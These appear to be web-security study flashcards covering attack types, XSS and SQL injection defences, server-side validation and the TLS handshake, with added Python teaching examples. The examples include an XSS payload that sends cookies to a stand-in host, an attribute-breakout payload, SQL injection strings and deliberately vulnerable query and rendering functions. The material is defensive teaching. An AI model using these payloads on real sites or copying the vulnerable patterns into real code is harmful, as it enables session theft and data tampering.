Web Security Flashcards

1
Q

Why would an attacker target my site?

A
  • Read private data (user names, passwords, credit card numbers, grades, prices)
  • Change data (change a student’s grades, prices of products, passwords)
  • Spread viruses and other malware
  • Damage or shut down the site, so that it cannot be successfully used by others
  • Harm the reputation or credibility of the organization running the site
  • Spoofing (pretending to be someone they are not)
2
Q

Some Security Recommendations:

A
  • Examine the page source that your server-side script sends to the browser (the attacker can read everything in it)
  • Examine network traffic and AJAX requests (browser developer tools show every request and response)
  • Listen to white hat hackers
  • Assume that the attacker knows about web development and has the same tools you have
  • COMPLEXITY INCREASES SECURITY RISK: every extra feature, dependency or code path is more attack surface

Awareness + Protection = Security

assume nothing; trust no one

3
Q

A selection of attack types

A
  • Denial of Service (DoS): Making a server unavailable by bombarding it with requests (or with a few requests that are very expensive to process)
  • Social Engineering: Tricking a user into compromising the security of a site (e.g. phishing)
  • Privilege Escalation: Causing code to run in a more privileged context than intended (e.g. as “root”, or as an administrator of the web application)
  • Information Leakage: Allowing an attacker to look at data meant to be confidential
  • Man-in-the-Middle: Intercepting the traffic between client and server, then reading and/or manipulating it
  • Session Hijacking: Stealing another user’s session cookie to masquerade as that user
    • an attacker can listen to the network, get your session ID cookie, and make requests to the same server with that same session ID cookie to masquerade as you (example: Firesheep, which did exactly this on unencrypted Wi-Fi)
  • Cross-Site Scripting (XSS), a form of HTML Injection: Inserting malicious HTML or JavaScript content into a web page so that it runs in other users’ browsers
    • injected script code can:
      • masquerade as the original page and trick the user into entering sensitive data
      • steal the user’s cookies
      • masquerade as the user and submit data on their behalf (submit forms, click buttons, etc.)
  • SQL Injection: Inserting malicious SQL query code through user input to reveal or modify sensitive data
4
Q

Securing against HTML injection / XSS / SQL injection

A
  • disallow harmful characters
    • HTML injection into element content is impossible without < >, but injection into an attribute value or an inline script needs only a quote character, so blocking characters alone is not a complete defence
  • allow them, but escape them at the point where the value is written into the page (or the query), so the receiver treats them as data rather than as markup or code
  • validate the input on the server:
    • preventing blank values (such as for email)
    • ensuring the type of the value (integer, date, etc.)
    • ensuring the format and the range of the values (e.g., postcode format)
    • ensuring certain combinations of values fit together properly
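The following is an added example, not code from the original flashcards: it contrasts the “disallow < >” approach with output escaping in two HTML contexts. The payloads, the page fragments and the `contains_live_script` heuristic are constructed for the demonstration; the only library call is Python’s standard `html.escape`.

```python
import html

# Constructed payloads (not from the original page) for two injection contexts.
SCRIPT_PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
# This one contains no < or > at all: it closes the value="..." attribute and adds an event handler.
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)" x="'


def strip_angle_brackets(value: str) -> str:
    """The 'disallow harmful characters' approach: drop < and > only."""
    return value.replace("<", "").replace(">", "")


def render_comment_unsafe(comment: str) -> str:
    """Writes user input straight into element content (deliberately vulnerable)."""
    return f"<p class='comment'>{comment}</p>"


def render_comment_safe(comment: str) -> str:
    """Escapes &, <, >, \" and ' so the browser displays the text instead of parsing it."""
    return f"<p class='comment'>{html.escape(comment, quote=True)}</p>"


def render_search_box_unsafe(last_query: str) -> str:
    """Writes user input into an attribute value (deliberately vulnerable, even without < >)."""
    return f'<input name="q" value="{last_query}">'


def render_search_box_safe(last_query: str) -> str:
    """Attribute context: the quote character must be escaped too (quote=True does that)."""
    return f'<input name="q" value="{html.escape(last_query, quote=True)}">'


def contains_live_script(fragment: str) -> bool:
    """Crude demo heuristic: does the fragment contain an unescaped <script> tag
    or an unescaped event-handler attribute? Not a real XSS detector."""
    return "<script" in fragment or ' onfocus="' in fragment
```

Stripping `<` and `>` neutralises the first payload but leaves the second fully working, because the attribute context is broken out of with a double quote. Escaping on output handles both, and the same `html.escape` call is correct for element content and for quoted attribute values (inline JavaScript and URL contexts need their own encoding).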
5
Q

Securing against SQL injection specifically

A
  • escape the string before you include it in your query
    • replaces ' with \' (or doubles it to ''), etc., and surrounds the value with quotes, so the database reads the attacker’s input as a string literal rather than as SQL
  • sanitising user input (check type, length and format before the value gets anywhere near the query)
  • using prepared statements (i.e. a pre-compiled SQL query template whose placeholders are filled with the values afterwards; the values are never parsed as SQL, so this is the preferred defence)
  • limiting database permissions (e.g. principle of least privilege: the web application’s database account should only be able to read or write the tables it needs, so a successful injection cannot drop tables or read everything)
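An added example (not from the original flashcards) showing the four measures above on a SQLite database: the vulnerable concatenated query, manual quote escaping, a prepared statement, and a read-only connection as the least-privilege measure. The table, the user rows and the attack string are constructed for the demonstration; SQLite is used because Python ships it, and the read-only `mode=ro` URI stands in for the restricted database account a real deployment would use.

```python
import os
import sqlite3
import tempfile

# Constructed sample data (not from the original page).
USERS = [("alice", "hash-of-alice-pw"), ("bob", "hash-of-bob-pw")]
# Classic payload: closes the opening quote and adds an always-true condition.
ATTACK = "' OR '1'='1"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users (username, password_hash) VALUES (?, ?)", USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Deliberately vulnerable: the input becomes part of the SQL text."""
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def sql_quote(value: str) -> str:
    """Manual escaping: double every single quote and surround with quotes.
    Correct for string literals, but easy to forget and useless for numeric
    or identifier positions, so prefer prepared statements."""
    return "'" + value.replace("'", "''") + "'"


def lookup_escaped(conn: sqlite3.Connection, username: str) -> list:
    sql = "SELECT username FROM users WHERE username = " + sql_quote(username)
    return [row[0] for row in conn.execute(sql)]


def lookup_prepared(conn: sqlite3.Connection, username: str) -> list:
    """Prepared statement: the template is compiled first and the value is bound
    afterwards, so the value can never be parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


def write_blocked_on_read_only_connection() -> bool:
    """Least privilege: hand the query path a read-only connection so that even a
    successful injection cannot modify data. Returns True if the write was refused."""
    path = os.path.join(tempfile.mkdtemp(), "users.db")
    setup = sqlite3.connect(path)
    setup.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    setup.commit()
    setup.close()
    read_only = sqlite3.connect("file:" + path + "?mode=ro", uri=True)
    try:
        read_only.execute("INSERT INTO users (username) VALUES ('mallory')")
        return False
    except sqlite3.OperationalError:  # "attempt to write a readonly database"
        return True
    finally:
        read_only.close()
```

With the payload, the concatenated query becomes `WHERE username = '' OR '1'='1'` and returns every user; the escaped and prepared variants compare against the literal string and return nothing.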
6
Q

Client-Side Validation vs. Server-Side Validation

+ what is used respectively

A

Client-Side Validation

Two ways:

  • Implicit: having the browser automatically enforce certain limitations (e.g. using radio buttons or a drop-down list rather than a free text field, or input attributes such as required and maxlength).
  • Explicit: the validation is done by the page’s author through JavaScript.

Client-side validation improves usability, but the attacker controls the browser and can bypass it (edit the page, disable JavaScript, or send the request directly), so it must never be the only check.

Server-Side Validation

  • Regular expressions are used in server-side validation. (A sequence of characters that defines a search pattern, used to check that a value has the expected format.) This is the check that counts, because the attacker cannot skip it.
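An added example (not from the original flashcards) of server-side validation with regular expressions, covering the checks listed under “Securing against HTML injection / XSS / SQL injection” as well: blank values, value type, format and range, and combinations of values. The form fields, the simplified UK postcode and e-mail patterns, and the sample submissions are all constructed for the demonstration; it also shows the `^...$` pitfall that `fullmatch` avoids.

```python
import re
from datetime import date

# Format patterns (simplified for illustration). They are used with fullmatch()
# rather than search() with ^...$: "$" also matches just before a trailing newline,
# so "42\n" would pass a ^\d+$ check and might later break a downstream parser.
UK_POSTCODE_RE = re.compile(r"[A-Z]{1,2}\d[A-Z\d]? ?\d[A-Z]{2}")
EMAIL_RE = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")
INTEGER_RE = re.compile(r"\d+")


def naive_integer_check(value: str) -> bool:
    """Common mistake: accepts '42\\n' because $ matches before a final newline."""
    return re.search(r"^\d+$", value) is not None


def validate_booking(form: dict) -> list:
    """Validates the raw strings a browser submitted. Returns a list of error
    messages; an empty list means the input is acceptable. Nothing here trusts
    any client-side JavaScript check."""
    errors = []

    # blank values
    email = form.get("email", "").strip()
    if not email:
        errors.append("email: must not be blank")
    elif not EMAIL_RE.fullmatch(email):
        errors.append("email: invalid format")

    # type (checked before int() so a crafted value cannot raise) and range
    guests = form.get("guests", "")
    if not INTEGER_RE.fullmatch(guests):
        errors.append("guests: must be a whole number")
    elif not 1 <= int(guests) <= 8:
        errors.append("guests: must be between 1 and 8")

    # format
    postcode = form.get("postcode", "").strip().upper()
    if not UK_POSTCODE_RE.fullmatch(postcode):
        errors.append("postcode: invalid UK postcode")

    # type (dates) and a combination of values that must fit together
    try:
        check_in = date.fromisoformat(form.get("check_in", ""))
        check_out = date.fromisoformat(form.get("check_out", ""))
    except ValueError:
        errors.append("dates: must be YYYY-MM-DD")
    else:
        if check_out <= check_in:
            errors.append("dates: check-out must be after check-in")

    return errors


# Constructed sample submissions (not from the original page).
GOOD_FORM = {"email": "alice@example.com", "guests": "2", "postcode": "SW1A 1AA",
             "check_in": "2024-06-01", "check_out": "2024-06-05"}
BAD_FORM = {"email": "", "guests": "2; DROP TABLE bookings", "postcode": "1234",
            "check_in": "2024-06-05", "check_out": "2024-06-01"}
```

Every check works on the string as received; the integer is only converted after the regular expression has confirmed it is one, and the two dates are only compared after both parsed, so a malformed field produces an error message rather than an exception.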
7
Q

definition and characterstics of SSL and TLS

A

Cryptographic protocols designed for secure communication over a computer network. SSL is the older protocol and TLS its successor; both use asymmetric (public-key) cryptography to authenticate the server and agree a key, then symmetric encryption for the actual traffic.

  • To use SSL/TLS the server needs a certificate issued by a certificate authority; commercial certificates can cost up to a couple of hundred dollars a year (domain-validated certificates are also available free, e.g. from Let’s Encrypt).
  • Using SSL/TLS may have an impact on performance because encrypting and decrypting messages consumes CPU time and memory (the public-key operations in the handshake are the expensive part; the symmetric bulk encryption is cheap on modern hardware).
8
Q

explain the SSL or TLS handshake

between an SSL client and SSL server

A
  1. Client contacts server (ClientHello: supported protocol versions and cipher suites, plus a random value)
  2. Server responds with its server certificate (ServerHello: the chosen cipher suite and its own random value)
  3. Client checks the certificate (signature chain to a trusted CA, validity period, name matches the host) and the cryptographic parameters
  4. Client sends a secret (the pre-master secret) encrypted with the server’s public key, plus its own client certificate if the server asked for one
  5. Server verifies the client certificate (only when client authentication is used)
  6. Client and server exchange Finished messages to signal that everything checked out
  7. Messages are then encrypted with the shared symmetric session key derived from the exchanged secret

This is the RSA key-exchange handshake of SSL and TLS up to 1.2; TLS 1.3 instead always uses an ephemeral Diffie-Hellman exchange, so the secret is never encrypted with the server’s long-term public key and a later key compromise cannot decrypt recorded traffic (forward secrecy).
9
Q

list 3 types of certificates

A

Domain Validation (DV) - Certificate Authority (CA) checks only the domain name.

Organisation Validation (OV) - CA checks domain and vets some information about organisation.

Extended Validation (EV) - CA checks domain and conducts thorough vetting of multiple aspects of the organisation, according to strict guidelines.

10
Q

How are the HTTP POST and GET methods related to security?

A

In forms,

HTTP POST requests supply additional data from the client (browser) to the server in the message body.

GET requests hold all data in the URL, which is much less secure: URLs end up in the browser history, bookmarks, proxy and server logs, and the Referer header sent to other sites. Sensitive data (passwords, session tokens) should therefore be sent with POST. Neither method hides the data from someone listening on the network unless the connection uses TLS.

11
Q

What might different error messages in browsers reveal to attackers?

A

A 403 (Forbidden) response shows that the resource exists but access is denied, whereas a 404 (Not Found) shows that it does not, so an attacker can tell hidden files and directories apart from non-existent ones.

This information can be useful for attackers, as can detailed error pages (stack traces, database errors, software versions), so production sites should return generic error pages.

12
Q

How can the page source be used for an attack?

A

The page source of a website might reveal valuable information to hackers, such as commented-out sections revealing personal data, hidden form fields, or paths to scripts that were not meant to be public.

13
Q

server-side vs. client-side security

A

Server-side code is never sent to the browser, so users cannot read or modify it; client-side code (HTML, CSS, JavaScript) is fully visible to the user and can be altered before it runs, so any security check that matters must be done on the server.

(JavaScript runs on both the server, e.g. in Node.js, and the client.)

14
Q

What are botnes?

(NOT NEEDED FOR EXAM)

A

Once a hacker has gained access to your computer or website, they build in a backdoor for future access. Many such compromised machines together form a botnet, an army of zombie computers that can be ordered to perform any kind of task: data crunching, theft, DoS attacks, etc.

15
Q

In order to write secure code, we must assume:

A
  • invalid input
  • evil users
  • incompetent users
  • everything that can go wrong, will go wrong
  • everybody is out to get you
  • botnets, hackers, script kiddies, KGB, etc. are out there